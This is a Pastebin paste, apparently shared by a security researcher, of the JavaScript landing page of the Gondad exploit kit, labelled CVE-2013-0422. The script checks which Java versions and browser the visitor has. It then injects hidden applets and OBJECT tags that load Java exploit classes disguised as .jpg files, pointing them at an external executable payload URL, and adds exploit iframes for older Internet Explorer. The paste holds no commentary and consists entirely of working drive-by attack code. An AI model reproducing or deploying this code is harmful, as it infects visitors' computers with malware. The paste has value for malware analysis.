Advertisement
eromang

Gond Da CVE-2013-0422

Jan 13th, 2013
833
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. YULYhT4=YhlMzgc5;ycPuv8=MWuNG2(20100418);while(window.closed){}document.write("<br>");
  2.  
  3. var gondady=document.createElement('body');
  4.  
  5. document.body.appendChild(gondady);
  6.  
  7. var gondadx=deployJava.getJREs()+"";
  8.  
  9. var arrx=gondadx.split(",");
  10.  
  11. gondadx=parseInt(arrx[0].replace(/\.|\_/g,''));
  12.  
  13. for(i=1;i<arrx.length;i++)
  14.  
  15. {
  16.  
  17. tmp=parseInt(arrx[i].replace(/\.|\_/g,''));
  18.  
  19. if (gondadx<tmp) gondadx=tmp;
  20.  
  21. }
  22.  
  23. if ((gondadx<=17010 && gondadx>=17000) || (gondadx<=16032 && gondadx>=16000) || (gondadx<=15033 && gondadx>=15000))
  24.  
  25. {
  26.  
  27. var gondad = document.createElement('applet');
  28.  
  29. gondad.width="1";
  30.  
  31. gondad.height="1";
  32.  
  33. if((gondadx<=16027 && gondadx>=16000) || (gondadx>=15000 && gondadx<=15031))
  34.  
  35. {
  36.  
  37. gondad.archive="EnKi2.jpg";
  38.  
  39. gondad.code="GondadGondadExp.class";
  40.  
  41. gondad.setAttribute("dota","http://www.triples.kr/data/m0111.exe");
  42.  
  43. document.body.appendChild(gondad);
  44.  
  45. }
  46.  
  47. else if ((gondadx<=17002 && gondadx>=17000) || (gondadx<=16030 && gondadx>=16000) || (gondadx<=15033 && gondadx>=15000))
  48.  
  49. {
  50.  
  51. gondad.archive="cLxmGk3.jpg";
  52.  
  53. gondad.code="GondadExx.Ohno.class";
  54.  
  55. gondad.setAttribute("xiaomaolv","http://www.triples.kr/data/m0111.exe");
  56.  
  57. gondad.setAttribute("bn","woyouyizhixiaomaolv");
  58.  
  59. gondad.setAttribute("si","conglaiyebuqi");
  60.  
  61. gondad.setAttribute("bs","748");
  62.  
  63. document.body.appendChild(gondad);
  64.  
  65. }
  66.  
  67. else if ((gondadx<=17003 && gondadx>=17000) || (gondadx<=16032 && gondadx>=16000) || (gondadx<=15032 && gondadx>=15000))
  68.  
  69. {
  70.  
  71. gondad.archive="OLluRM4.jpg";
  72.  
  73. gondad.code="gond1723.Gondattack.class";
  74.  
  75. gondad.setAttribute("xiaomaolv","http://www.triples.kr/data/m0111.exe");
  76.  
  77. gondad.setAttribute("bn","woyouyizhixiaomaolv");
  78.  
  79. gondad.setAttribute("si","conglaiyebuqi");
  80.  
  81. gondad.setAttribute("bs","748");
  82.  
  83. document.body.appendChild(gondad);
  84.  
  85. }
  86.  
  87. else if (gondadx<=17006 && gondadx>=17000)
  88.  
  89. {
  90.  
  91. var nsVkNcB7 = window.navigator.userAgent.toLowerCase();
  92.  
  93. if (nsVkNcB7.indexOf('msie 6') > -1)
  94.  
  95. {
  96.  
  97. document.write("<OBJECT classid='clsid:8AD9C840-044E-11D1-B3E9-00805F499D93' width='200' height='200'><param name=xiaomaolv value= 'http://www.triples.kr/data/m0111.exe'><param name=bn value= 'woyouyizhixiaomaolv'><param name=si value= 'conglaiyebuqi'><param name=bs value= '748'><param name=CODE value= 'cve2012xxxx.Gondvv.class'><param name=archive value= 'GPUrKz2.jpg'></OBJECT>");
  98.  
  99. }
  100.  
  101. else
  102.  
  103. {
  104.  
  105. gondad.archive="GPUrKz2.jpg";
  106.  
  107. gondad.code="cve2012xxxx.Gondvv.class";
  108.  
  109. gondad.setAttribute("xiaomaolv","http://www.triples.kr/data/m0111.exe");
  110.  
  111. gondad.setAttribute("bn","woyouyizhixiaomaolv");
  112.  
  113. gondad.setAttribute("si","conglaiyebuqi");
  114.  
  115. gondad.setAttribute("bs","748");
  116.  
  117. document.body.appendChild(gondad);
  118.  
  119. }
  120.  
  121. }
  122.  
  123. else if (gondadx<=17007 && gondadx>=17000)
  124.  
  125. {
  126.  
  127. var nsVkNcB7 = window.navigator.userAgent.toLowerCase();
  128.  
  129. if (nsVkNcB7.indexOf('msie 6') > -1)
  130.  
  131. {
  132.  
  133. document.write("<OBJECT classid='clsid:8AD9C840-044E-11D1-B3E9-00805F499D93' width='200' height='200'><param name=xiaomaolv value= 'http://www.triples.kr/data/m0111.exe'><param name=bn value= 'woyouyizhixiaomaolv'><param name=si value= 'conglaiyebuqi'><param name=bs value= '748'><param name=CODE value= 'gond20125076.Gondqq.class'><param name=archive value= 'PBLO5.jpg'></OBJECT>");
  134.  
  135. }
  136.  
  137. else
  138.  
  139. {
  140.  
  141. gondad.archive="PBLO5.jpg";
  142.  
  143. gondad.code="gond20125076.Gondqq.class";
  144.  
  145. gondad.setAttribute("xiaomaolv","http://www.triples.kr/data/m0111.exe");
  146.  
  147. gondad.setAttribute("bn","woyouyizhixiaomaolv");
  148.  
  149. gondad.setAttribute("si","conglaiyebuqi");
  150.  
  151. gondad.setAttribute("bs","748");
  152.  
  153. document.body.appendChild(gondad);
  154.  
  155. }
  156.  
  157. }
  158.  
  159. else if (gondadx<=17010 && gondadx>=17000)
  160.  
  161. {
  162.  
  163. var nsVkNcB7 = window.navigator.userAgent.toLowerCase();
  164.  
  165. if (nsVkNcB7.indexOf('msie 6') > -1)
  166.  
  167. {
  168.  
  169. document.write("<OBJECT classid='clsid:8AD9C840-044E-11D1-B3E9-00805F499D93' width='200' height='200'><param name=xiaomaolv value= 'http://www.triples.kr/data/m0111.exe'><param name=bn value= 'woyouyizhixiaomaolv'><param name=si value= 'conglaiyebuqi'><param name=bs value= '748'><param name=CODE value= 'xml20130422.XML20130422.class'><param name=archive value= 'Nuwm7.jpg'></OBJECT>");
  170.  
  171. }
  172.  
  173. else
  174.  
  175. {
  176.  
  177. gondad.archive="Nuwm7.jpg";
  178.  
  179. gondad.code="xml20130422.XML20130422.class";
  180.  
  181. gondad.setAttribute("xiaomaolv","http://www.triples.kr/data/m0111.exe");
  182.  
  183. gondad.setAttribute("bn","woyouyizhixiaomaolv");
  184.  
  185. gondad.setAttribute("si","conglaiyebuqi");
  186.  
  187. gondad.setAttribute("bs","748");
  188.  
  189. document.body.appendChild(gondad);
  190.  
  191. }
  192.  
  193. }
  194.  
  195. }
  196.  
  197. else { 
  198.  
  199.     /*
  200.  
  201.     if(jPzgRJ8['major']==11 && jPzgRJ8['minor']<=3 && jPzgRJ8['rev']<=300 && jPzgRJ8['gondad']<= 270){
  202.  
  203.     document.writeln("<img src=BbjxIS5.swf><\/img>");
  204.  
  205.     setTimeout("document.writeln(\"<embed width=100 height=0 src=BbjxIS5.swf><\\/embed>\");",2000);
  206.  
  207.     }
  208.  
  209.     else{
  210.  
  211.     */
  212.  
  213.     var nsVkNcB7 = window.navigator.userAgent.toLowerCase();
  214.  
  215.     if ((nsVkNcB7.indexOf('msie 6') > -1)||(nsVkNcB7.indexOf('msie 7') > -1)) {
  216.  
  217.     document.writeln("<iframe src=dNPnQv6.html><\/iframe>");
  218.  
  219.     }
  220.  
  221.     else if((nsVkNcB7.indexOf('msie 8') > -1) && (navigator.userAgent.indexOf('Windows NT 5.1') > -1) && (navigator.browserLanguage.indexOf('ko') > -1)){
  222.  
  223.     document.writeln("<iframe src=EnKi2.html><\/iframe>");
  224.  
  225.     }
  226.  
  227.     //}
  228.  
  229. }
  230.  
  231. ;
  232.  
  233. delete wmonxI1;
  234.  
  235. delete MGYESsc0;
  236.  
  237. delete AMHbjzs4;
  238.  
  239. delete jktL2;
  240.  
  241. delete KRptNF4;
  242.  
  243. delete PgPwzuc4;
  244.  
  245. delete OvHOXgU4;
  246.  
  247. delete qSGFYA3;
  248.  
  249. delete SgQRfb0;
  250.  
  251. delete ePrX4;
  252.  
  253. delete coPlMK3;
  254.  
  255. delete wuVcF1;
  256.  
  257. delete NbCR7;
  258.  
  259. delete YhlMzgc5;
  260.  
  261. delete TwDRJS7;
  262.  
  263. delete UecbIIb5;
  264.  
  265. delete JUSjP3;
  266.  
  267. delete mfcYy6;
  268.  
  269. delete CyXBL6;
  270.  
  271. delete MWuNG2;
  272.  
  273. delete ycPuv8;
  274.  
  275. delete LwzPnER1;
  276.  
  277. delete QPxh0;
  278.  
  279. delete YULYhT4;
  280.  
  281. delete JVRM5;
  282.  
  283. delete bMjm3;
  284.  
  285. delete aSWNeIe2;
  286.  
  287. delete mXJbF2;
  288.  
  289. delete XUvDRHW5;
  290.  
  291. delete PaNxF7;
  292.  
  293. delete MmDR7;
  294.  
  295. delete yGWrC3;
  296.  
  297. delete qKeHgyW6;
  298.  
  299. delete zQSeh4;
  300.  
  301. delete UGna4;
  302.  
  303. delete nmWF3;
  304.  
  305. delete vOIbn4;
  306.  
  307. delete EfMkiWK8;
  308.  
  309. delete gdxWs6;
  310.  
  311. delete fIWAN4;
  312.  
  313. try{CollectGarbage();}catch(e){}
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement